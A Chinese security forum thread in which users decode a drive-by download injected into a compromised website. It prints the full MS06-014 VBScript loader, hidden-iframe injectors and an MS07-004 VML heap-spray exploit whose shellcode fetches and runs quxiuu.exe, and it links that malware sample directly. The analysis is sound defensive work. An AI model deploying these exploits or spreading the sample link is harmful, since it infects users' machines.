是否毒网, 红伞报警!

蓝色牛仔裤

http://ruan15.mxarticle.com/60046.html

xpn282

我的红伞没报

promised

屏蔽了弹出窗口

蓝色牛仔裤

哦~原来是脚本...

gggh

卡巴不报警...

小邪邪

只是拦截了弹出窗口

dikex

确认有毒，具体的分析中，先来一个样本
http://quxiuu.com/quxiuu.exe

小邪邪

这个quxiuu.exe倒是杀了

dikex

关键就是那个弹出的广告，弹出的站点http://61.175.222.246/被挂马了，在它的主页的最上面被加入了使用escape处理过的代码，解密得：

1. document.write(unescape("<head><title>xh_New Year///</title>
   
2. <script language=VBScript>
   
3. on error resume next
   
4. set zero = document.createElement("ob" & "ject")
   
5. zero.setAttribute "cl" & "assid", "cl" & "sid:BD" & "96C556-65A3-11D0-983A-00C04" & "FC29E36"
   
6. str3 = "Ad" & "odb.St" & "ream"
   
7. set F = zero.createobject(str3,"")
   
8. if Not Err.Number = 0 then
   
9. err.clear
   
10. document.write("<i"+"frame style='display:none;' src=2007.htm width=1 height=1 frameborder=0></i"+"frame>")
    
11. else
    
12. document.write("<i"+"frame style='display:none;' src=xiaoH.htm width=1 height=1 frameborder=0></i"+"frame>")
    
13. end if
    
14. </script>
    
15. </head>
    
16. </html>
    
17. 
    
18. "));

复制代码

可以看出又是最近流行的MS06-014网马（多得麻木了……），这个页面会因应不动的情况打开xiaoH.htm或者2007.htm，其中xiaoH.htm又是一个ms06-014网马（汗……），上面挂了http://quxiuu.com/quxiuu.exe；
而另外一种情况则转到2007.htm，里面经过ascii处理得：

1. <script language="Javascript">
   
2. function Get(){
   
3. var Then = new Date()
   
4. Then.setTime(Then.getTime() + 24*60*60*1000)
   
5. var cookieString = new String(document.cookie)
   
6. var cookieHeader = "Cookie1="
   
7. var beginPosition = cookieString.indexOf(cookieHeader)
   
8. if (beginPosition != -1){
   
9. } else
   
10. { document.cookie = "Cookie1=POPWIN;expires="+ Then.toGMTString()
    
11. inject = "<iframe style='display:none;' src=xiao.htm width=1 height=1 frameborder=0></iframe>"
    
12. setTimeout("document.write(inject)", 5000 );
    
13. }
    
14. }Get();
    
15. </script>

复制代码

明显就是会打开http://61.175.222.246/xiao.htm，这个经过ascii处理的结果是：

1. <script language="JavaScript">
   
2. scmain = unescape("%u4343%u4343%u4343%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a%u6870%u7474%u3a70%u2f2f%u7571%u6978%u7575%u632e%u6d6f%u712f%u7875%u7569%u2e75%u7865%u0065");s4c=scmain+myurl;
   
3. sk1p = unescape("%u0D0D%u0D0D");hs1ze = 20;
   
4. sc1en = hs1ze+s4c.length
   
5. while (sk1p.length<sc1en) sk1p+=sk1p;
   
6. skiip = sk1p.substring(0, sc1en);
   
7. xiao_2007 = sk1p.substring(0, sk1p.length-sc1en);
   
8. while(xiao_2007.length+sc1en<0x40000) xiao_2007 = xiao_2007+xiao_2007+skiip;
   
9. memt = new Array();
   
10. i=0;while(++i<500){memt[i] = xiao_2007 + s4c;}
    
11. var a1 = unescape("%u0d0d");
    
12. var b2;
    
13. for(i=0; i<0x100-19; i++)  b2+=a1;
    
14. document.write("<htm"+"l xmlns:v="ur"+"n:schem"+"as-mic"+"rosoft-com:v"+"ml">\r\n");
    
15. document.write("<head>\r\n");
    
16. document.write("<object id="VM"+"LRender" classid="CLSID:100"+"72CEC-8C"+"C1-11D1-9"+"86E-0"+"0A0C9"+"55B42E">\r\n");
    
17. document.write("</object>");
    
18. document.write("<style>");
    
19. document.write("v\\:* { behavior: url(#VMLRender); }");
    
20. document.write("</style>");
    
21. document.write("</head>");
    
22. document.write("<v:rect style='width:120pt;height:80pt' fillcolor="green">\r\n");
    
23. document.write("<v:fill method="");
    
24. document.write(b2);
    
25. document.write(unescape("%u0c0c%u0d0d"));
    
26. for(i=0;i<100;i++)document.write(b2);
    
27. document.write("" /></v:rect>")
    
28. </script>

复制代码

这个是MS07-004网马（终于不是ms06-014了，感动ing～～），由于本人对ms07-004网马的结构不清楚，无法直接知道它要干什么，其中那段用escape处理过的解密后出现乱码！于是就用嗅探器看看它会下载什么，但很可惜，虽然它可以打开，但貌似没有办法执行，出现了：

1. The requested URL /codebase/dff was not found on this server.
   
2. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request

复制代码

最后放上样本

xpn282

很详细

高手